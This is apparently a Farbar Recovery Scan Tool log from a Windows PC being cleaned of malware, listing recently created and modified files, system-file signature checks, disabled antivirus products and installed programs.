2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 17:57 - 2014-08-17 17:23 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:04 - 2014-08-16 17:05 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-15 20:57 - 2014-08-16 12:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-15 20:56 - 2014-08-16 09:22 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:12 - 2014-08-15 13:13 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:04 - 2014-08-15 13:21 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:12 - 2014-08-15 11:13 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:11 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-25 09:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-14 18:20 - 2014-08-20 23:44 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-20 23:44 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-25 09:19 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-14 18:19 - 2014-08-23 11:16 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:19 - 2014-08-04 03:06 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
2014-08-14 18:19 - 2014-07-18 03:11 - 00016064 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\BootDefragDriver.sys
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:15 - 2014-08-14 18:16 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:37 - 2014-08-14 17:40 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:28 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 20:51 - 2014-08-13 20:52 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 18:02 - 2014-08-22 16:10 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 17:58 - 2014-08-15 03:47 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 16:53 - 2014-08-22 21:40 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 16:51 - 2014-08-25 09:16 - 00000000 ____D () C:\ProgramData\IrfuqApivh
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-25 09:47 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST
2014-08-25 09:47 - 2014-07-18 00:39 - 01989969 _____ () C:\Windows\WindowsUpdate.log
2014-08-25 09:44 - 2011-12-22 18:52 - 00001356 _____ () C:\Users\savas.kyriakidis\AppData\Local\d3d9caps.dat
2014-08-25 09:35 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-25 09:23 - 2006-11-02 06:33 - 00694332 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-08-25 09:20 - 2014-08-14 18:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-25 09:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-25 09:18 - 2008-08-06 12:35 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job
2014-08-25 09:17 - 2014-08-22 16:12 - 00039662 _____ () C:\Windows\PFRO.log
2014-08-25 09:17 - 2006-11-02 09:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-25 09:17 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-25 09:17 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-25 09:16 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh
2014-08-25 09:16 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\system
2014-08-25 09:15 - 2006-11-02 09:01 - 00032640 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-08-25 08:26 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-25 08:17 - 2014-08-22 13:25 - 00000850 _____ () C:\Windows\setupact.log
2014-08-24 15:46 - 2014-08-24 15:23 - 00000000 ____D () C:\ComboFix
2014-08-24 15:45 - 2014-08-24 15:45 - 00046297 _____ () C:\ComboFix.txt
2014-08-24 15:45 - 2014-08-22 15:52 - 00000000 ____D () C:\Qoobox
2014-08-24 15:40 - 2006-11-02 06:23 - 00000215 _____ () C:\Windows\system.ini
2014-08-24 15:38 - 2011-12-29 11:34 - 00000000 ____D () C:\Windows\ERDNT
2014-08-23 16:48 - 2014-08-22 14:00 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-23 16:30 - 2011-03-14 18:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-23 14:45 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\schemas
2014-08-23 14:32 - 2011-03-14 18:43 - 00000000 ____D () C:\Windows\pss
2014-08-23 14:22 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public
2014-08-23 14:09 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis
2014-08-23 14:09 - 2011-02-10 21:08 - 00000000 ____D () C:\Users\Rita
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:53 - 2014-08-23 11:51 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-23 11:16 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-23 11:05 - 2014-08-23 11:02 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-08-22 21:40 - 2014-08-22 17:05 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 21:40 - 2014-08-12 16:53 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-22 17:13 - 2012-05-16 21:52 - 00000000 ____D () C:\temp
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:10 - 2014-08-12 18:02 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495
2014-08-22 15:42 - 2014-08-22 14:32 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:15 - 2011-12-22 20:05 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-08-22 13:54 - 2014-08-22 13:41 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-21 00:06 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Google
2014-08-20 23:44 - 2014-08-14 18:20 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-20 23:44 - 2014-08-14 18:20 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-20 23:39 - 2008-08-06 12:41 - 00000000 ____D () C:\Program Files\Google
2014-08-20 20:00 - 2009-06-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark Z700-P700 Series
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-19 18:12 - 2014-08-20 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-17 17:23 - 2014-08-16 17:57 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-17 17:23 - 2011-07-10 20:09 - 00000000 ____D () C:\$AVG
2014-08-17 16:31 - 2011-07-10 19:21 - 00000000 ____D () C:\ProgramData\MFAData
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 18:01 - 2011-07-10 19:25 - 00000000 ____D () C:\Program Files\AVG
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:05 - 2014-08-16 17:04 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:05 - 2014-08-15 20:57 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 10:06 - 2012-10-02 18:32 - 00000000 ____D () C:\Program Files\HTC
2014-08-16 09:27 - 2008-08-06 12:49 - 00000000 ____D () C:\Program Files\Citrix
2014-08-16 09:22 - 2014-08-15 20:56 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 20:41 - 2012-10-02 18:45 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Htc
2014-08-15 19:55 - 2008-08-06 12:37 - 00000000 ____D () C:\Program Files\Microsoft Office
2014-08-15 17:56 - 2006-11-02 08:47 - 00267048 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:26 - 2011-06-17 17:39 - 00058896 _____ () C:\Windows\system32\GDIPFONTCACHEV1.DAT
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:21 - 2014-08-15 13:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:13 - 2014-08-15 13:12 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 13:01 - 2012-01-24 17:09 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\LogMeIn Rescue Applet
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:13 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:12 - 2014-08-15 11:11 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-15 03:47 - 2014-08-12 17:58 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:16 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:40 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 23:07 - 2013-06-10 19:17 - 00002463 _____ () C:\Users\Public\Desktop\Transporter.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:31 - 2014-08-13 21:28 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:31 - 2011-12-24 11:26 - 00000000 ____D () C:\Program Files\iTunes
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 21:28 - 2008-09-02 12:28 - 00000000 ____D () C:\Program Files\Common Files\Apple
2014-08-13 21:02 - 2008-09-02 12:28 - 00000000 ____D () C:\ProgramData\Apple
2014-08-13 20:52 - 2014-08-13 20:51 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-13 20:41 - 2013-04-22 21:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2014-08-13 20:18 - 2008-08-06 12:41 - 00000000 ____D () C:\ProgramData\Google
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 17:13 - 2011-08-28 07:57 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\ALL Folders
2014-08-12 17:09 - 2011-08-28 08:01 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\Desk Top Stuff
2014-08-04 03:06 - 2014-08-14 18:19 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-08-25 09:24
 
==================== End Of Log ============================

Addition

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version:23-08-2014
Ran by savas.kyriakidis at 2014-08-25 09:48:44
Running from G:\
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Disabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}
AV: AVG Internet Security 2011 (Disabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
AS: AVG Internet Security 2011 (Disabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
AS: Microsoft Security Essentials (Disabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: AVG Firewall (Disabled) {621CC794-9486-F902-D092-0484E8EA828B}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
32 Bit HP CIO Components Installer (Version: 3.1.1 - Hewlett-Packard) Hidden
6500_E709_eDocs (Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709_Help (Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709a (Version: 50.0.165.000 - Hewlett-Packard) Hidden
Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)
Acrobat.com (Version: 2.0.0 - Adobe Systems Incorporated) Hidden
ActivClient CAC x86 (HKLM\...\{1BE8806A-84F8-4655-A381-0D5524430944}) (Version: 6.2 - ActivIdentity)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.2.0.2070 - Adobe Systems Incorporated)
Adobe AIR (Version: 3.2.0.2070 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.0.1.152 - Adobe Systems Incorporated)
Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKCU\...\Akamai) (Version:  - Akamai Technologies, Inc)
Any Video Converter 3.0.1 (HKLM\...\Any Video Converter_is1) (Version:  - Any-Video-Converter.com)
Apple Application Support (HKLM\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{941B4CE7-3F5D-443E-A8B7-56A420D2EAFD}) (Version: 7.1.2.6 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.007.0731.2233 - )
AVG 2011 (HKLM\...\AVG) (Version: 10.0.1416 - AVG Technologies)
AVG 2011 (Version: 10.0.1388 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1390 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1391 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1392 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1410 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1416 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.2109 - AVG Technologies) Hidden
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
bpd_scan (Version: 3.00.0000 - Hewlett-Packard) Hidden
BPDSoftware (Version: 50.0.165.000 - Hewlett-Packard) Hidden
BPDSoftware_Ini (Version: 1.00.0000 - Hewlett-Packard) Hidden
Browser Address Error Redirector (HKLM\...\{62230596-37E5-4618-A329-0D21F529A86F}) (Version: 1.00.0000 - Dell)
BufferChm (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Catalyst Control Center Core Implementation (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Chinese Standard (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Chinese Traditional (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization French (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization German (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Hungarian (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Italian (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Japanese (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Korean (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Polish (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Portuguese (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Spanish (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Thai (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Turkish (Version: 2007.0731.2234.38497 - ATI) Hidden
CCC Help Chinese Standard (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Chinese Traditional (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help English (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help French (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help German (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Hungarian (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Italian (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Japanese (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Korean (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Polish (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Portuguese (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Spanish (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Thai (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Turkish (Version: 2007.0731.2233.38497 - ATI) Hidden
ccc-core-static (Version: 2007.0731.2234.38497 - ATI) Hidden
ccc-utility (Version: 2007.0731.2234.38497 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.13 - Piriform)
